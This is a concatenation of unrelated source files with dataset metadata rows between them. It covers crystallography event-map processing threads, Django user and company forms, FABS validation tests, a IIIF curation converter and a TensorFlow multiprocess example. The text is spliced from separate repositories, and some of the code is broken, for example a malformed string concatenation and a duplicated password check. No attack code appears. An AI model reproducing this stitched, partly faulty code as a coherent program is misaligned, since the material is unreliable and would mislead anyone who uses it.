' RESOLUTION %s\n' %self.resolution+
' END\n'
)
self.Logfile.insert('preparing script for conversion of Event map to SF')
f = open('eventMap2sf.sh','w')
f.write(cmd)
f.close()
os.system('chmod +x eventMap2sf.sh')
def run_conversion_script(self):
self.Logfile.insert('running conversion script...')
os.system('./eventMap2sf.sh')
def convert_map_to_p1(self):
self.Logfile.insert('running mapmask -> converting map to p1...')
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'mapmask mapin %s mapout %s_p1.map << eof\n' %(self.event_map,self.event) +
'xyzlin cell\n'
'symmetry p1\n' )
self.Logfile.insert('mapmask command:\n%s' %cmd)
os.system(cmd)
def run_phenix_map_to_structure_factors(self):
if float(self.resolution) < 1.21: # program complains if resolution is 1.2 or higher
self.resolution='1.21'
self.Logfile.insert('running phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
os.system('phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
def run_cinvfft(self,mtzin):
# mtzin is usually refine.mtz
self.Logfile.insert('running cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
os.system('cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
def remove_and_rename_column_labels(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=F-obs E2=PHIF\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: new column labels F_ampl,PHIF')
os.system(cmd)
def remove_and_rename_column_labels_after_cinvfft(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=event.F_phi.F E2=event.F_phi.phi\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: renaming event.F_phi.F -> F_ampl and event.F_phi.phi -> PHIF')
os.system(cmd)
def update_database(self):
sqlite = ( "update panddaTable set "
" PANDDA_site_event_map_mtz = '%s' " %os.path.join(self.project_directory,self.xtalID,self.event+'.mtz')+
" where PANDDA_site_event_map is '{0!s}' ".format(self.event_map)
)
self.db.execute_statement(sqlite)
self.Logfile.insert('updating data source: '+sqlite)
def clean_output_directory(self):
os.system('/bin/rm mask_targetcell.pdb')
os.system('/bin/rm mask_targetcell.msk')
os.system('/bin/rm onecell.map')
os.system('/bin/rm masked_targetcell.map')
os.system('/bin/rm masked_fullcell.map')
os.system('/bin/rm eventMap2sf.sh')
os.system('/bin/rm '+self.ligand_pdb)
class run_pandda_inspect_at_home(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def run(self):
os.chdir(os.path.join(self.panddaDir,'processed_datasets'))
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('parsing '+self.panddaDir)
for xtal in sorted(glob.glob('*')):
for files in glob.glob(xtal+'/ligand_files/*'):
if os.path.islink(files):
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'replacing symlink for {0!s} with real file'.format(files))
self.Logfile.insert('replacing symlink for {0!s} with real file'.format(files))
os.system('cp --remove-destination {0!s} {1!s}/ligand_files'.format(os.path.realpath(files), xtal))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
XChemToolTips.run_pandda_inspect_at_home(self.panddaDir)
class convert_apo_structures_to_mmcif(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def sf_convert_environment(self):
pdb_extract_init = ''
if os.path.isdir('/dls'):
pdb_extract_init = 'source /dls/science/groups/i04-1/software/pdb-extract-prod/setup.sh\n'
pdb_extract_init += '/dls/science/groups/i04-1/software/pdb-extract-prod/bin/sf_convert'
else:
pdb_extract_init = 'source ' + os.path.join(os.getenv('XChemExplorer_DIR'),
'pdb_extract/pdb-extract-prod/setup.sh') + '\n'
pdb_extract_init += +os.path.join(os.getenv('XChemExplorer_DIR'),
'pdb_extract/pdb-extract-prod/bin/sf_convert')
return pdb_extract_init
def run(self):
self.Logfile.insert('converting apo structures in pandda directory to mmcif files')
self.Logfile.insert('chanfing to '+self.panddaDir)
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob(os.path.join(self.panddaDir,'processed_datasets','*'))))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
pdb_extract_init = self.sf_convert_environment()
self.Logfile.insert('parsing '+self.panddaDir)
for dirs in glob.glob(os.path.join(self.panddaDir,'processed_datasets','*')):
xtal = dirs[dirs.rfind('/')+1:]
self.Logfile.insert('%s: converting %s to mmcif' %(xtal,xtal+'-pandda-input.mtz'))
if os.path.isfile(os.path.join(dirs,xtal+'-pandda-input.mtz')):
if os.path.isfile(os.path.join(dirs,xtal+'_sf.mmcif')):
self.Logfile.insert('%s: %s_sf.mmcif exists; skipping...' %(xtal,xtal))
else:
os.chdir(dirs)
Cmd = (pdb_extract_init +
' -o mmcif'
' -sf %s' % xtal+'-pandda-input.mtz' +
' -out {0!s}_sf.mmcif > {1!s}.sf_mmcif.log'.format(xtal, xtal))
self.Logfile.insert('running command: '+Cmd)
os.system(Cmd)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
class check_number_of_modelled_ligands(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,db_file):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.db=XChemDB.data_source(db_file)
self.errorDict={}
def update_errorDict(self,xtal,message):
if xtal not in self.errorDict:
self.errorDict[xtal]=[]
self.errorDict[xtal].append(message)
def insert_new_row_in_panddaTable(self,xtal,ligand,site,dbDict):
resname= site[0]
chain= site[1]
seqnum= site[2]
altLoc= site[3]
x_site= site[5][0]
y_site= site[5][1]
z_site= site[5][2]
resnameSimilarSite= ligand[0]
chainSimilarSite= ligand[1]
seqnumSimilarSite= ligand[2]
siteList=[]
for entry in dbDict[xtal]:
siteList.append(str(entry[0]))
if entry[4] == resnameSimilarSite and entry[5] == chainSimilarSite and entry[6] == seqnumSimilarSite:
eventMap= str(entry[7])
eventMap_mtz= str(entry[8])
initialPDB= str(entry[9])
initialMTZ= str(entry[10])
event_id= str(entry[12])
PanDDApath= str(entry[13])
db_dict={
'PANDDA_site_index': str(int(max(siteList))+1),
'PANDDApath': PanDDApath,
'PANDDA_site_ligand_id': resname+'-'+chain+'-'+seqnum,
'PANDDA_site_ligand_resname': resname,
'PANDDA_site_ligand_chain': chain,
'PANDDA_site_ligand_sequence_number': seqnum,
'PANDDA_site_ligand_altLoc': 'D',
'PANDDA_site_event_index': event_id,
'PANDDA_site_event_map': eventMap,
'PANDDA_site_event_map_mtz': eventMap_mtz,
'PANDDA_site_initial_model': initialPDB,
'PANDDA_site_initial_mtz': initialMTZ,
'PANDDA_site_ligand_placed': 'True',
'PANDDA_site_x': x_site,
'PANDDA_site_y': y_site,
'PANDDA_site_z': z_site }
print xtal,db_dict
def run(self):
self.Logfile.insert('reading modelled ligands from panddaTable')
dbDict={}
sqlite = ( "select "
" CrystalName,"
" PANDDA_site_index,"
" PANDDA_site_x,"
" PANDDA_site_y,"
" PANDDA_site_z,"
" PANDDA_site_ligand_resname,"
" PANDDA_site_ligand_chain,"
" PANDDA_site_ligand_sequence_number,"
" PANDDA_site_event_map,"
" PANDDA_site_event_map_mtz,"
" PANDDA_site_initial_model,"
" PANDDA_site_initial_mtz,"
" RefinementOutcome,"
" PANDDA_site_event_index,"
" PANDDApath "
"from panddaTable " )
dbEntries=self.db.execute_statement(sqlite)
for item in dbEntries:
xtal= str(item[0])
site= str(item[1])
x= str(item[2])
y= str(item[3])
z= str(item[4])
resname= str(item[5])
chain= str(item[6])
seqnum= str(item[7])
eventMap= str(item[8])
eventMap_mtz= str(item[9])
initialPDB= str(item[10])
initialMTZ= str(item[11])
outcome= str(item[12])
event= str(item[13])
PanDDApath= str(item[14])
if xtal not in dbDict:
dbDict[xtal]=[]
dbDict[xtal].append([site,x,y,z,resname,chain,seqnum,eventMap,eventMap_mtz,initialPDB,initialMTZ,outcome,event,PanDDApath])
os.chdir(self.project_directory)
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for xtal in sorted(glob.glob('*')):
if os.path.isfile(os.path.join(xtal,'refine.pdb')):
ligands=XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).ligand_details_as_list()
self.Logfile.insert('{0!s}: found file refine.pdb'.format(xtal))
if ligands:
if os.path.isdir(os.path.join(xtal,'xceTmp')):
os.system('/bin/rm -fr {0!s}'.format(os.path.join(xtal,'xceTmp')))
os.mkdir(os.path.join(xtal,'xceTmp'))
else:
self.Logfile.warning('{0!s}: cannot find ligand molecule in refine.pdb; skipping...'.format(xtal))
continue
made_sym_copies=False
ligands_not_in_panddaTable=[]
for n,item in enumerate(ligands):
resnameLIG= item[0]
chainLIG= item[1]
seqnumLIG= item[2]
altLocLIG= item[3]
occupancyLig= item[4]
if altLocLIG.replace(' ','') == '':
self.Logfile.insert(xtal+': found a ligand not modelled with pandda.inspect -> {0!s} {1!s} {2!s}'.format(resnameLIG, chainLIG, seqnumLIG))
residue_xyz = XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).get_center_of_gravity_of_residue_ish(item[1],item[2])
ligands[n].append(residue_xyz)
foundLigand=False
if xtal in dbDict:
for entry in dbDict[xtal]:
resnameTable=entry[4]
chainTable=entry[5]
seqnumTable=entry[6]
self.Logfile.insert('panddaTable: {0!s} {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
if resnameLIG == resnameTable and chainLIG == chainTable and seqnumLIG == seqnumTable:
self.Logfile.insert('{0!s}: found ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
foundLigand=True
if not foundLigand:
self.Logfile.error('{0!s}: did NOT find ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameLIG, chainLIG, seqnumLIG))
ligands_not_in_panddaTable.append([resnameLIG,chainLIG,seqnumLIG,altLocLIG,occupancyLig,residue_xyz])
else:
self.Logfile.warning('ligand in PDB file, but dataset not listed in panddaTable: {0!s} -> {1!s} {2!s} {3!s}'.format(xtal, item[0], item[1], item[2]))
for entry in ligands_not_in_panddaTable:
self.Logfile.error('{0!s}: refine.pdb contains a ligand that is not assigned in the panddaTable: {1!s} {2!s} {3!s} {4!s}'.format(xtal, entry[0], entry[1], entry[2], entry[3]))
for site in ligands_not_in_panddaTable:
for files in glob.glob(os.path.join(self.project_directory,xtal,'xceTmp','ligand_*_*.pdb')):
mol_xyz = XChemUtils.pdbtools(files).get_center_of_gravity_of_molecule_ish()
# now need to check if there is a unassigned entry in panddaTable that is close
for entry in dbDict[xtal]:
distance = XChemUtils.misc().calculate_distance_between_coordinates(mol_xyz[0], mol_xyz[1],mol_xyz[2],entry[1],entry[2], entry[3])
self.Logfile.insert('{0!s}: {1!s} {2!s} {3!s} <---> {4!s} {5!s} {6!s}'.format(xtal, mol_xyz[0], mol_xyz[1], mol_xyz[2], entry[1], entry[2], entry[3]))
self.Logfile.insert('{0!s}: symm equivalent molecule: {1!s}'.format(xtal, files))
self.Logfile.insert('{0!s}: distance: {1!s}'.format(xtal, str(distance)))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
if self.errorDict != {}:
self.update_errorDict('General','The aforementioned PDB files were automatically changed by XCE!\nPlease check and refine them!!!')
self.emit(QtCore.SIGNAL('show_error_dict'), self.errorDict)
class find_event_map_for_ligand(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,external_software):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.external_software=external_software
try:
import gemmi
self.Logfile.insert('found gemmi library in ccp4-python')
except ImportError:
self.external_software['gemmi'] = False
self.Logfile.warning('cannot import gemmi; will use phenix.map_to_structure_factors instead')
def run(self):
self.Logfile.insert('======== checking ligand CC in event maps ========')
for dirs in sorted(glob.glob(os.path.join(self.project_directory,'*'))):
xtal = dirs[dirs.rfind('/')+1:]
if os.path.isfile(os.path.join(dirs,'refine.pdb')) and \
os.path.isfile(os.path.join(dirs,'refine.mtz')):
self.Logfile.insert('%s: found refine.pdb' %xtal)
os.chdir(dirs)
try:
p = gemmi.read_structure('refine.pdb')
except:
self.Logfile.error('gemmi library not available')
self.external_software['gemmi'] = False
reso = XChemUtils.mtztools('refine.mtz').get_dmin()
ligList = XChemUtils.pdbtools('refine.pdb').save_residues_with_resname(dirs,'LIG')
self.Logfile.insert('%s: found %s ligands of type LIG in refine.pdb' %(xtal,str(len(ligList))))
for maps in glob.glob(os.path.join(dirs,'*event*.native.ccp4')):
if self.external_software['gemmi']:
self.convert_map_to_sf_with_gemmi(maps,p)
else:
self.expand_map_to_p1(maps)
self.convert_map_to_sf(maps.replace('.ccp4','.P1.ccp4'),reso)
summary = ''
for lig in sorted(ligList):
if self.external_software['gemmi']:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
else:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native*P1.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
self.Logfile.insert('\nsummary of CC analysis:\n======================:\n'+summary)
def expand_map_to_p1(self,emap):
self.Logfile.insert('expanding map to P1: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.P1.ccp4')):
self.Logfile.warning('P1 map exists; skipping...')
return
cmd = ( 'mapmask MAPIN %s MAPOUT %s << eof\n' %(emap,emap.replace('.ccp4','.P1.ccp4'))+
' XYZLIM CELL\n'
' PAD 0.0\n'
' SYMMETRY 1\n'
'eof\n' )
os.system(cmd)
def convert_map_to_sf(self,emap,reso):
self.Logfile.insert('converting ccp4 map to mtz with phenix.map_to_structure_factors: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.map_to_structure_factors %s d_min=%s\n' %(emap,reso)+
'/bin/mv map_to_structure_factors.mtz %s' %emap.replace('.ccp4', '.mtz') )
os.system(cmd)
def get_lig_cc(self,mtz,lig):
self.Logfile.insert('calculating CC for %s in %s' %(lig,mtz))
if os.path.isfile(mtz.replace('.mtz', '_CC.log')):
self.Logfile.warning('logfile of CC analysis exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.get_cc_mtz_pdb %s %s > %s' % (mtz, lig, mtz.replace('.mtz', '_CC.log')) )
os.system(cmd)
def check_lig_cc(self,log):
cc = 'n/a'
if os.path.isfile(log):
for line in open(log):
if line.startswith('local'):
cc = line.split()[len(line.split()) - 1]
else:
self.Logfile.error('logfile does not exist: %s' %log)
return cc
def convert_map_to_sf_with_gemmi(self,emap,p):
self.Logfile.insert('converting ccp4 map to mtz with gemmi map2sf: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = 'gemmi map2sf %s %s FWT PHWT --dmin=%s' %(emap,emap.replace('.ccp4','.mtz'),p.resolution)
self.Logfile.insert('converting map with command:\n' + cmd)
os.system(cmd) | 50.594484 | 265 | 0.589447 | 11,782 | 99,064 | 4.772704 | 0.077661 | 0.037167 | 0.043836 | 0.02415 | 0.627952 | 0.557049 | 0.516467 | 0.482288 | 0.439305 | 0.404823 | 0 | 0.008995 | 0.290762 | 99,064 | 1,958 | 266 | 50.594484 | 0.791346 | 0.084077 | 0 | 0.391509 | 0 | 0.022911 | 0.22382 | 0.037865 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.001348 | 0.014825 | null | null | 0.006739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe8a256140b6390c55cadca6d58880f260544702 | 5,253 | py | Python | OmegaErp/Apps/base/forms/__init__.py | OMAR-EHAB777/FerpMenu | 6aee4616bc9bc7801023fe51acfa28e1e1267b66 | [
"BSD-3-Clause"
] | null | null | null | OmegaErp/Apps/base/forms/__init__.py | OMAR-EHAB777/FerpMenu | 6aee4616bc9bc7801023fe51acfa28e1e1267b66 | [
"BSD-3-Clause"
] | null | null | null | OmegaErp/Apps/base/forms/__init__.py | OMAR-EHAB777/FerpMenu | 6aee4616bc9bc7801023fe51acfa28e1e1267b66 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Global app forms
"""
# Standard Library
import re
# Django Library
from django import forms
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
# Thirdparty Library
from dal import autocomplete
# Localfolder Library
from ..models import PyCompany, PyCountry, PyUser
from .partner import PartnerForm
class PerfilForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'first_name',
'last_name',
'celular',
)
labels = {
'first_name': _('Name'),
'last_name': _('Last Name'),
'celular': _('Mobile Phone'),
}
widgets = {
'first_name': forms.TextInput(attrs={'class': 'form-control'}),
'last_name': forms.TextInput(attrs={'class': 'form-control'}),
'celular': forms.TextInput(attrs={'class': 'form-control'}),
}
class PersonaChangeForm(UserChangeForm):
"""for something will be
"""
class Meta(UserChangeForm.Meta):
model = PyUser
fields = (
'email',
'is_superuser',
'is_staff',
'is_active',
'last_login',
'date_joined',
'first_name',
'last_name',
)
# ========================================================================== #
class PasswordRecoveryForm(forms.ModelForm):
"""To send the account recovery correction
"""
class Meta():
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
# ========================================================================== #
class PasswordSetForm(forms.Form):
"""To send the account recovery correction
"""
password1 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Password')}
)
)
password2 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Retype password')}
)
)
def clean(self):
super().clean()
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
print('entre8888')
if password1 != password2:
raise forms.ValidationError(
_('The two password fields didn\'t match.')
)
if password1 != password2:
raise forms.ValidationError(
_('The two password fields didn\'t match.')
)
class PersonaCreationForm(UserCreationForm):
"""This form class renders the record sheet of
users
"""
class Meta(UserCreationForm.Meta):
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
class AvatarForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'avatar',
)
class InitForm(forms.ModelForm):
"""From of OMegaERP initializacion
"""
email = forms.EmailField(
widget=forms.EmailInput(
attrs={
'placeholder': _('Admin email')
}
)
)
password = forms.CharField(
max_length=100,
widget=forms.PasswordInput(
attrs={
'placeholder': _('Admin Password')
}
)
)
class Meta:
model = PyCompany
fields = [
'name',
'country',
'email',
'password'
]
labels = {
'name': _('Company Name'),
'country': _('Country'),
'email': _('Admin user email'),
'password': _('Password'),
}
widgets = {
'name': forms.TextInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Company Name'),
'style': 'width: 100%',
},
),
'country': autocomplete.ModelSelect2(
url='PyCountry:autocomplete',
attrs={
'class': 'form-control',
'data-placeholder': _('Select a country...'),
'style': 'width: 100%',
},
),
'email': forms.EmailInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Admin user email'),
'style': 'width: 100%',
},
),
}
class ActivateForm(forms.Form):
"""To activate or deactivate an object in OmegaERP
"""
object_name = forms.CharField(max_length=100, widget=forms.HiddenInput)
object_pk = forms.IntegerField(widget=forms.HiddenInput) | 26.938462 | 80 | 0.491148 | 421 | 5,253 | 6.035629 | 0.320665 | 0.039355 | 0.055096 | 0.082645 | 0.420307 | 0.408107 | 0.341598 | 0.250295 | 0.250295 | 0.250295 | 0 | 0.009204 | 0.358843 | 5,253 | 195 | 81 | 26.938462 | 0.745249 | 0.118409 | 0 | 0.387755 | 0 | 0 | 0.187035 | 0.004818 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006803 | false | 0.129252 | 0.047619 | 0 | 0.190476 | 0.006803 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
fe8c212fdb626e028311eb927a139fd3cc7bba51 | 1,455 | py | Python | tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py | COEJKnight/one | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | [
"CC0-1.0"
] | 1 | 2018-10-29T12:54:44.000Z | 2018-10-29T12:54:44.000Z | tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py | COEJKnight/one | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | [
"CC0-1.0"
] | null | null | null | tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py | COEJKnight/one | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | [
"CC0-1.0"
] | null | null | null | from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'fabs38_detached_award_financial_assistance_2'
def test_column_headers(database):
expected_subset = {"row_number", "awarding_office_code"}
actual = set(query_columns(_FILE, database))
assert expected_subset == actual
def test_success(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAA')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='111111')
det_award_3 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAA111')
det_award_4 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='')
det_award_5 = DetachedAwardFinancialAssistanceFactory(awarding_office_code=None)
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5])
assert errors == 0
def test_failure(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAA1')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAAA')
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2])
assert errors == 2
| 45.46875 | 120 | 0.808935 | 164 | 1,455 | 6.762195 | 0.347561 | 0.100992 | 0.129847 | 0.359784 | 0.427412 | 0.427412 | 0.427412 | 0.308386 | 0.308386 | 0.308386 | 0 | 0.022446 | 0.112027 | 1,455 | 31 | 121 | 46.935484 | 0.835913 | 0.065979 | 0 | 0 | 0 | 0 | 0.077323 | 0.032714 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.15 | false | 0 | 0.1 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe8e1c215219c1805761ef6232ba7b858bfbd7b4 | 3,641 | py | Python | src/conv/convertManifest2Curation.py | nakamura196/i3 | 16d7695e5412b45dc8e0192d9ca285723ac9f788 | [
"Apache-2.0"
] | 3 | 2020-04-21T11:36:10.000Z | 2022-02-01T00:46:59.000Z | src/conv/convertManifest2Curation.py | nakamura196/i3 | 16d7695e5412b45dc8e0192d9ca285723ac9f788 | [
"Apache-2.0"
] | 17 | 2021-01-08T17:20:38.000Z | 2021-06-29T05:55:47.000Z | src/conv/convertManifest2Curation.py | nakamura196/i3 | 16d7695e5412b45dc8e0192d9ca285723ac9f788 | [
"Apache-2.0"
] | null | null | null | import urllib.request
from bs4 import BeautifulSoup
import csv
import requests
import os
import json
import time
import glob
files = glob.glob("/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json")
for i in range(len(files)):
file = files[i]
file_id = file.split("/")[-1].replace(".json", "")
opath = "/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/curation/"+file_id+".json"
if not os.path.exists(opath):
fw = open(opath, 'w')
curation_data = {}
curation_uri = "curation:"+file_id+".json"
with open(file) as f:
try:
df = json.load(f)
except:
continue
anno_count = 1
if "sequences" in df:
print(file)
members = []
canvases = df["sequences"][0]["canvases"]
for j in range(len(canvases)):
canvas = canvases[j]
if "otherContent" in canvas:
id = canvas["otherContent"][0]["@id"]
headers = {"content-type": "application/json"}
# time.sleep(0.5)
r = requests.get(id, headers=headers)
data = r.json()
print(id)
resources = data["resources"]
for resource in resources:
member_id = resource["on"]
res = resource["resource"]
chars = res["chars"]
member = {
"@id": member_id,
"@type": "sc:Canvas",
"label": "[Annotation " + str(anno_count) + "]",
"description": chars,
"metadata": [
{
"label": res["@type"],
"value": chars
}
]
}
anno_count += 1
members.append(member)
if len(members) > 0:
label = ""
if "label" in df:
label = df["label"]
curation_data = {
"@context": [
"http://iiif.io/api/presentation/2/context.json",
"http://codh.rois.ac.jp/iiif/curation/1/context.json"
],
"@type": "cr:Curation",
"@id": curation_uri,
"label": "Automatic curation by IIIF Converter",
"selections": [
{
"@id": curation_uri + "/range1",
"@type": "sc:Range",
"label": "Automatic curation by IIIF Converter",
"members": members,
"within": {
"@id": df["@id"],
"@type": "sc:Manifest",
"label": label
}
}
]
}
json.dump(curation_data, fw, ensure_ascii=False, indent=4, sort_keys=True, separators=(',', ': '))
| 31.938596 | 106 | 0.355397 | 275 | 3,641 | 4.64 | 0.4 | 0.014107 | 0.025078 | 0.026646 | 0.131661 | 0.131661 | 0.073668 | 0.073668 | 0.073668 | 0.073668 | 0 | 0.007688 | 0.535567 | 3,641 | 113 | 107 | 32.221239 | 0.746895 | 0.00412 | 0 | 0.024691 | 0 | 0.024691 | 0.173289 | 0.037528 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.098765 | 0 | 0.098765 | 0.024691 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe93e83fe7e8770b4f2c1e2cf97bec6cd0abb158 | 1,628 | py | Python | examples/multiprocess_example.py | ct-clmsn/distributed-tensorflow-orchestration | c841659881e98209149bd6e3e09774a50e3c748e | [
"Apache-2.0"
] | 5 | 2016-07-27T08:25:17.000Z | 2022-02-07T19:41:45.000Z | examples/multiprocess_example.py | ct-clmsn/distributed-tensorflow-orchestration | c841659881e98209149bd6e3e09774a50e3c748e | [
"Apache-2.0"
] | null | null | null | examples/multiprocess_example.py | ct-clmsn/distributed-tensorflow-orchestration | c841659881e98209149bd6e3e09774a50e3c748e | [
"Apache-2.0"
] | 1 | 2022-02-07T19:41:46.000Z | 2022-02-07T19:41:46.000Z | '''
marathon_example.py
performs a simple matrix multiply using 3 compute nodes
'''
def parseargs():
parser = argparse.ArgumentParser(description='Marathon for TensorFlow.')
parser.add_argument('--n_tasks', default=1, help='an integer for the accumulator')
parser.add_argument('--cpu', default=100.0, help='an integer for the accumulator')
parser.add_argument('--mem', default=100.0, help='an integer for the accumulator')
parser.add_argument('--taskname', default=uuid.uuid1(), help='name for the task')
parser.add_argument('--url', help='DNS addr to marathon')
parser.add_argument('--usr', help='marathon username')
parser.add_argument('--usrpwd', help='marathon password')
parser.add_argument('--uri', help='curl-friendly URI to the tensorflow client executable (url?, hdfs?, docker?)')
args = parser.parse_args()
return args
if __name__ == '__main__':
from sys import argv
import tensorflow as tf
from dtforchestrator import *
args = parseargs()
with MultiprocessTensorFlowSession(args.taskname, args.n_tasks) as tfdevices:
with tf.device(tfdevices.getDeviceSpec(1)):
matrix1 = tf.constant([[3.],[3.]])
with tf.device(tfdevices.getDeviceSpec(2)):
matrix2 = tf.constant([[3.,3.]])
with tf.device(tfdevices.getDeviceSpec(0)):
matrix0 = tf.constant([[3.,3.]])
product1 = tf.matmul(matrix0, matrix1)
product2 = tf.matmul(matrix2, matrix1)
